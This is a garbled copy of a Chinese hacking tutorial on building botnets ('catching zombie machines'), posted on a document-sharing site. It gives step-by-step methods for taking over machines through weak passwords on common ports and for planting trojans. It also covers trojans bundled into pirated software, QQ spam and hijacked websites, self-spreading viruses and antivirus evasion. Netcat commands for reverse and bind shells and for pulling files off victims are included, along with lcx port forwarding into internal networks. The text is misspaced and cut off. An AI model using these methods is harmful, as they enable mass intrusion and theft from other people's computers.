经典抓肉鸡入门.docx

上传人:b****8 文档编号:30441412 上传时间:2023-08-15 格式:DOCX 页数:38 大小:1.07MB
下载 相关 举报
经典抓肉鸡入门.docx_第1页
第1页 / 共38页
经典抓肉鸡入门.docx_第2页
第2页 / 共38页
经典抓肉鸡入门.docx_第3页
第3页 / 共38页
经典抓肉鸡入门.docx_第4页
第4页 / 共38页
经典抓肉鸡入门.docx_第5页
第5页 / 共38页
点击查看更多>>
下载资源
资源描述

经典抓肉鸡入门.docx

《经典抓肉鸡入门.docx》由会员分享,可在线阅读,更多相关《经典抓肉鸡入门.docx(38页珍藏版)》请在冰豆网上搜索。

经典抓肉鸡入门.docx

经典抓肉鸡入门

经典抓肉鸡入门

1.一般XP都很难扫不出IP,先要突破一下,可以用工具是“使xp支持syn扫描”,运行就重启。

线程就可以达到10240,然后将每次扫描,关闭防火墙命令是"netstopsharedaccess",一般都可以扫出IP,如果还不行,换个IP段。

2.扫描环境

一般都是XP系统,但其实扫描IP速度很慢,而且扫不多!

我建议抓鸡最好用服务器,服务器指2003系统,因为2003系统扫描速度快,而且扫到很多IP,是很好的抓鸡系统!

3.抓鸡方法:

135端口,先扫描135IP,然后整理!

然后用NTscan,扫描弱口令,最后用Recton上传木马,自动运行的!

因为这个漏洞很久,所以端口也很少的了!

如果整理IP不好,就很难扫出弱口令。

1433端口,先扫描1433IP,然后整理!

然后用X-Scan-v3.3,扫描模块只选择SQL-Server弱口令,然后扫出漏洞主机,再用SQLTools.exe连接,看看能不能执行DOS,如果不能就修复下,可以用“SQL查询分析器修正分离版”,修复命令我会打包的了!

3389端口,先扫描3389IP,然后用远程桌面连接,一个一个IP添加进入,见到XP,用户new密码为空进入,然后下载木马!

见到2000,用户administrator密码为空进入然后下载木马!

4899端口,先扫描4899IP,然后整理!

然后用4899探测器,A导入4899IP,然后开始搜索,B就是空口令的IP了,然后用Radmin,点连接到,把刚才扫到的空口令的IP添到IP地址那里,点确定,然后自己上传马,用DOS运行!

5900端口,用领域小组专版VNC扫描器,这个端口有些特别,不同其他的端口,所以扫IP工具也不同,扫到IP,看看有无V字开头,然后用VNCLink连接,自己然后下载马拉!

80端口,先扫描80IP,然后整理,再用ApacheTomcat导入IP,端口8080改为80,等IP全部导完,点开始就可以,你看看有无一些网站结尾是HTML或者很长的,就可以进入这个网,然后上传个“hcskk.war”然后点hcskk.war进入,就可以自己下载木马,再用DOS运行。

hcskk.war我会打包的了!

啊D简单抓鸡,就不用扫描IP了,直接点肉鸡查找,然后点开始,就会自动扫描IP+弱口令,然后你上传个木马,他会1分钟自动运行的了!

如果你不太会,可以用啊D帮你!

捆绑抓鸡也是比较常用的传播木马技术.把木马捆在游戏,流行软件上,配合以上方法,QQ,邮箱,BT,论坛,等发布捆了木马的软件.骗取点我们的软件,这样也就同时中了我们的木利用BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件然后捆绑上自己的木马,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦.

利用PP共享自己捆了木马的软件或电影.方法同BT一样,要找诱惑性电影或软件,捆上自己的木马,然后共享自己的目录,这样人家就会通过搜索找到你的软件或电影.这里电影要配合网页木马.可以参看RealOnePlaye木马制作.在黑吧可以找到.当你一打开我们的电影时就会打开我们制作过的网页木马.这样看电影也会中我们的马.

利用QQ邮箱传播木马.

这里主要点HTML格式----在里面写上以下这段代码:

当人家一打开你发过去的邮件时,就会中我们的木马

QQ群发网页木马。

首先,你要申请多个QQ号,然后找款QQ消息群发器(黑吧网站可以找到大量相关QQ群发信息软件,)再然后要加上非常具有诱惑性的消息(肉鸡的多与少与这个直接相关,),骗取人家点你的网址。

最后,在晚上时可以挂在电脑上群发带有网页木马的信息。

相信只要你的信息够诱惑,肉鸡也是成群的。

攻破下载点,捆上木马放入下载点.

当我们入侵到一些网站时,看看是否开放21服务,也就是是否提供FTP服务.若入侵到

这类网站,恭喜你,你又可以得到大批量肉鸡.你可以捆上自己的木马然后放入下载点

等待人家上钩吧!

该方法抓鸡的速度也非常快。

网站主页挂马这个应该不用具体介绍吧,入侵到一个网站得到WEBSHELL后,接下来大家是不是都忙着找首页挂马了。

大马也要免杀哦!

QQ空间主页挂马,因为每次进入QQ空间可以通过播放音乐,我们就在播放音乐那里添加自己的网马地址,就可以完成挂马拉!

音乐文件弹网马,就是在播放音乐时,弹出一个网马,就可以抓鸡了!

去白度贴吧说一些诱惑性的话,吸引别人下载你的木马,就可以抓鸡!

利用传播性高的病毒抓鸡,就是高手才可以的了,先做一个像熊猫烧香一样厉害的毒,因为传播强,但不要搞到死机,不然后就抓不到鸡了,然后我等于抓1只就可以传播到2只,2只传播到4只,这样抓鸡拉!

也可以找一个批量抓鸡工具,但不要有后门的,不然帮人抓鸡了!

4.免杀木马

抓鸡一定要个免杀木马,不然就抓不到的,先要学会免杀,那就容易抓到鸡拉!

不会可以先学定位,用CCM修改就OK了

三个入侵的必备小工具-lcx.exe、nc.exe、sc.exe作用几使用方法

2008年02月18日评论

(1)|浏览(10)点击查看原文

一、lcx.exe的使用方法

以前抓肉鸡都是通过1433弱口令,然后..

但是发现很多服务器开了1433,3389,但是终端是连不上的,因为服务器本身是在内网,只对外开放了1433端口,幸好有lcx.exe这个东西,用sqltools.exe传倒服务器上...

lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.

用法:

如在本机B上监听-listen513389,在肉鸡A上运行-slave本机ip51肉鸡ip3389那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。

例:

现在有一个ip为201.1.1.1的1433弱.用端口扫描只发现开放了1433端口.用sqltools链接,dir看一下C:

\>DIRC:

\

2004/09/1710:

32

autoAK

2005/02/2117:

0812,541avgun.log。

日语,显示不正常.呵呵.

netstat-an查看开放端口TCP0.0.0.0:

33760.0.0.0:

0LISTENING

TCP0.0.0.0:

33890.0.0.0:

0LISTENING

TCP0.0.0.0:

37910.0.0.0:

0LISTENING

TCP0.0.0.0:

38770.0.0.0:

0LISTENING

终端已开.看下IP

ipconfig

C:

\>ipconfig

Windows2000IPConfigurationEthernetadapter

Connection-specificDNSSuffix.:

IPAddress............:

192.168.1.24

SubnetMask...........:

255.255.255.0

DefaultGateway.........:

192.168.1.1192这样的是内网了...

现在可以用lcx.exe搞定了...

上传lcx.exe到肉鸡...C:

\>dirlcx.exeC:

\WINNT\system32

2006/04/0213:

4032,768lcx.exe首先在自己机子的cmd下运行

lcx.exe-listen513389

意思是监听51端口并转发到3389端口

显示如下[+]Listeningport51......

[+]ListenOK!

[+]Listeningport3389......

[+]ListenOK!

[+]WaitingforClientonport:

51......然后在肉鸡上运行lcx.exe-slave你的IP51201.1.1.13389

201.1.1.1是我举例用的肉鸡IP.换成你的..运行以后本机监听端口就会收到信息.[+]Listeningport51......

[+]ListenOK!

[+]Listeningport3389......

[+]ListenOK!

[+]WaitingforClientonport:

51......

[+]AcceptaClientonport55from201.1.1.1......

[+]WaitinganotherClientonport:

3389....好了.现在在自己机子上链接127.0.0.1或者输你自己IP.

发现进去的不是自己机子,(或者自己机子根本连不上),而是肉鸡A了!

优点,搞定内网肉鸡.

缺点,有点麻烦,而且每次都要通过sqltools先进行端口转发.当然也可以用反弹木马控制肉鸡了...

二、nc.exe的使用方法

1.Netcat1.10forNT-nc11nt.zip,原始英文信息

2.Netcat1.10forNT帮助信息

3.Netcat1.10常用的命令格式

4.管理肉鸡,更改肉鸡设置

5.下载连接

######################################################################

1.Netcat1.10forNT-nc11nt.zip

######################################################################

BasicFeatures

*Outboundorinboundconnections,TCPorUDP,toorfromanyports

*FullDNSforward/reversechecking,withappropriatewarnings

*Abilitytouseanylocalsourceport

*Abilitytouseanylocally-configurednetworksourceaddress

*Built-inport-scanningcapabilities,withrandomizer

*Canreadcommandlineargumentsfromstandardinputb

*Slow-sendmode,onelineeveryNseconds

*Hexdumpoftransmittedandreceiveddata

*Abilitytoletanotherprogramserviceestablished

connections

*Telnet-optionsresponder

NewforNT

*Abilitytoruninthebackgroundwithoutaconsolewindow

*Abilitytorestartasasingle-threadedservertohandleanew

connection

________________________________________________________________________

Someofthefeaturesofnetcatare:

Outboundorinboundconnections,TCPorUDP,toorfromanyports

FullDNSforward/reversechecking,withappropriatewarnings

Abilitytouseanylocalsourceport

Abilitytouseanylocally-configurednetworksourceaddress

Built-inport-scanningcapabilities,withrandomizer

Built-inloosesource-routingcapability

Canreadcommandlineargumentsfromstandardinput

Slow-sendmode,onelineeveryNseconds

Optionalabilitytoletanotherprogramserviceinboundconnections

Someofthepotentialusesofnetcat:

Scriptbackends

Scanningportsandinventoryingservices

Backuphandlers

Filetransfers

Servertestingandsimulation

Firewalltesting

Proxygatewaying

Networkperformancetesting

Addressspoofingtests

ProtectingXservers

1001otherusesyou`lllikelycomeupwith

Netcat+Encryption=Cryptcat

对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.

1.1NC.EXE是一个非标准的telnet客户端程序,

1.2还有一个putty.exe客户端程序,提供四种连接模式

-raw-telnet-rlogin-ssh.

######################################################################

2.Netcat1.10forNT帮助信息

######################################################################

C:

\WINDOWS\Desktop>nc-h

[v1.10NT]

connecttosomewhere:

nc[-options]hostnameport[s][ports]...

listenforinbound:

nc-l-pport[options][hostname][port]

options:

-ddetachfromconsole,backgroundmode(后台模式)

-eproginboundprogramtoexec[dangerous!

!

]

-ggatewaysource-routinghoppoint[s],upto8

-Gnumsource-routingpointer:

4,8,12,...

-hthiscruft(本帮助信息)

-isecsdelayintervalforlinessent,portsscanned(延迟时间)

-llistenmode,forinboundconnects(监听模式,等待连接)

-Llistenharder,re-listenonsocketclose(连接关闭后,仍然继续监听)

-nnumeric-onlyIPaddresses,noDNS(ip数字模式,非dns解析)

-ofilehexdumpoftraffic(十六进制模式输出文件,三段)

-pportlocalportnumber(本地端口)

-rrandomizelocalandremoteports(随机本地远程端口)

-saddrlocalsourceaddress(本地源地址)

-tanswerTELNETnegotiation

-uUDPmode

-vverbose[usetwicetobemoreverbose](-vv更多信息)

-wsecstimeoutforconnectsandfinalnetreads

-zzero-I/Omode[usedforscanning](扫描模式,-vv)

portnumberscanbeindividualorranges:

m-n[inclusive]

######################################################################

3.Netcat1.10常用的命令格式

######################################################################

下面引用《沉睡不醒10月15日凌晨》的文章的部分。

3.1.端口的刺探:

nc-vvipport

RIVER[192.168.0.198]19190(?

)open//显示是否开放open

3.2.扫描器

nc-vv-w5ipport-portport

nc-vv-zipport-portport

这样扫描会留下大量的痕迹,系统管理员会额外小心

3.3.后门

victimmachine:

//受害者的机器

nc-l-pport-ecmd.exe//win2000

nc-l-pport-e/bin/sh//unix,linux

attackermachine:

//攻击者的机器.

ncip-pport//连接victim_IP,然后得到一个shell。

3.4.反向连接

attackermachine:

//一般是sql2.exe,远程溢出,webdavx3.exe攻击.

//或者wollf的反向连接.

nc-vv-l-pport

victimmachine:

nc-ecmd.exeattackerip-pport

nc-e/bin/shattackerip-pport

或者:

attackermachine:

nc-vv-l-pport1/*用于输入*/

nc-vv-l-pprot2/*用于显示*/

victimmachine:

ncattacker_ipport1|cmd.exe|ncattacker_ipport2

ncattacker_ipport1|/bin/sh|ncattacker_ipport2

139要加参数-s(nc.exe-L-p139-d-ecmd.exe-s对方机器IP)

这样就可以保证nc.exe优先于NETBIOS。

3.5.传送文件:

3.5.1attackermachine<--victimmachine//从肉鸡拖密码文件回来.

nc-d-l-pportpath\file.txt/*victimmachine*/需要Ctrl+C退出

//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入

Crl+C.

3.5.2attackermachine-->victimmachine//上传命令文件到肉鸡

nc-vv-l-pport>path\file.txt     /*victimmachine*/需要Ctrl+C退

nc-dvictim_ipport

//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.

结论:

可以传输ascii,bin文件.可以传输程序文件.

问题:

连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.exe.

或者只有再次连接使用pskill.exe杀掉进程.但是是否释放传输文件打开的句柄了?

3.6端口数据抓包.

nc-vv-w2-otest.txt8021-15

<000000583530302053796e746178206572726f72#500Syntaxerro

r

<000000682c20636f6d6d616e6420222220756e72#,command""un

r

<0000007865636f676e697a65642e0d0a#ecognized...

<00000084830000018f#.....

3.7telnet,自动批处理。

★★★★★我要重点推荐的东西就是这个.

ncvictim_ipport

nc-vvvictim_ipport

nc-dvictim_ipporta.cmd

@echos>>a.cmd

@echocd/d%%windir%%\system32\>>a.cmd

@netstop"sksockserver">>a.cmd

@snake.exe-configport11111>>a.cmd

@netstart"sksockserver">>a.cmd

@exit>>a.cmd

:

auto

@for/f"eol=;tokens=1,2"%%iin(%1)do@(nc.exe-vv-w3%%i1234>80.txt

gotostart

把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多

是三条一组--妮姆达病毒扫描你的。

这样就会得到肉鸡的.虽然质量不高.

但是也是一种便宜的办法.

肉鸡特征:

1。

unicode漏洞

2。

guest密码为空,administrators组用户

3。

其他漏洞

自己慢慢的爽去吧。

不过,再次强调一句,不建议而且是不能破坏国内主机,上去以后

将tftp.exe改名。

然后用pskill干掉mmc.exe进程,之后是杀毒。

做好后门以后,将gue

st帐号停用,以对付

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 成人教育 > 电大

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1